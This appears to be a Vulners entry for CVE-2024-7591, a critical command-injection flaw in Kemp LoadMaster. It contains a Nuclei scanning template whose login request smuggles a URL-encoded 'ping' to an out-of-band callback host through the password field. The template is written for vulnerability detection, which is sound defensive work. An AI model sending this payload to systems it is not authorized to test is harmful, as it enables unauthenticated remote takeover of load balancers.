| Reporter | Title | Published | Views | Family All 14 |
|---|---|---|---|---|
| Exploit for OS Command Injection in Kemptechnologies Loadmaster | 11 Aug 202521:40 | – | githubexploit | |
| The vulnerability of the LoadMaster application deployment and management platform lies in its lack of measures to neutralize special elements used in the operating system’s command set, allowing attackers to execute arbitrary commands. | 10 Feb 202500:00 | – | bdu_fstec | |
| CVE-2024-7591 | 5 Sep 202421:23 | – | circl | |
| Kemp LoadMaster 安全漏洞 | 5 Sep 202400:00 | – | cnnvd | |
| CVE-2024-7591 | 5 Sep 202417:16 | – | cve | |
| CVE-2024-7591 Improper Input Validation vulnerability in Progress LoadMaster allows OS Command Injection | 5 Sep 202417:16 | – | cvelist | |
| Emergency Fix Issued for 10/10 Severity Vulnerability in LoadMaster Products | 9 Sep 202420:35 | – | hackread | |
| Vulnerability fixed in Kemp LoadMaster | 6 Sep 202408:02 | – | ncsc | |
| CVE-2024-7591 | 5 Sep 202418:15 | – | nvd | |
| CVE-2024-7591 | 5 Sep 202418:15 | – | osv |
id: CVE-2024-7591
info:
name: Kemp LoadMaster Load Balancer - Unauthenticated Command Injection
author: iamnoooob,rootxharsh,pdresearch
severity: critical
description: |
Improper Input Validation vulnerability in Progress LoadMaster allows OS Command Injection.This issue affects: LoadMaster: 7.2.40.0 and above. ECS: All versions.Multi-Tenancy: 7.1.35.4 and above.
impact: |
Unauthenticated attackers can execute arbitrary OS commands on the LoadMaster load balancer through command injection, achieving complete system compromise with potential to pivot to backend infrastructure.
remediation: |
Apply security updates from Kemp Technologies as specified in their security advisory for LoadMaster versions 7.2.40.0 and above, ECS all versions, and Multi-Tenancy 7.1.35.4 and above.
reference:
- https://insinuator.net/2024/11/vulnerability-disclosure-command-injection-in-kemp-loadmaster-load-balancer-cve-2024-7591/
- https://nvd.nist.gov/vuln/detail/cve-2024-7591
- https://support.kemptechnologies.com/hc/en-us/articles/29196371689613-LoadMaster-Security-Vulnerability-CVE-2024-7591
- https://insinuator.net/2024/11/vulnerability-disclosure-command-injection-in-kemp-loadmaster-load-balancer-cve-2024-7591
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10
cve-id: CVE-2024-7591
cwe-id: CWE-78
epss-score: 0.44069
epss-percentile: 0.98593
cpe: cpe:2.3:a:kemptechnologies:loadmaster:*:*:*:*:*:*:*:*
metadata:
verified: true
vendor: kemptechnologies
product: loadmaster
max-request: 2
shodan-query: html:"Kemp Login Screen"
tags: cve,cve2024,loadmaster,rce,oast,kemptechnologies,vuln
variables:
oast: ".{{interactsh-url}}"
payload: "{{padding(oast,'a',50,'prefix')}}"
http:
- raw:
- |
GET /progs/homepage HTTP/1.1
Host: {{Hostname}}
extractors:
- type: regex
part: body
name: token
group: 1
regex:
- 'value="(.*?)" name="token"'
internal: true
- type: regex
part: body
name: token2
group: 1
regex:
- 'value="(.*?)" name="token2"'
internal: true
- raw:
- |
POST /progs/status/login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
token={{token}}&token2={{token2}}&user=test&logsub=Login&pass=%01%78%78%78%78%78%78%78%27%3b%70%69%6e%67%20%2d%63%20%32%20{{payload}}%3b%65%63%68%6f%20%27%01&
matchers:
- type: dsl
dsl:
- contains(interactsh_protocol, 'dns')
- contains_all(body, "alert(\"Login Failed\");", "2 packets transmitted")
condition: and
# digest: 4b0a00483046022100cca147724f5af562a223a8593b78ac01a8ee15d8f2b959d15967b84acbb19a28022100e6d95b5e6685e4aa5d2f5b00c31d910a16576bb62157384f659a09197c12b0c2:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation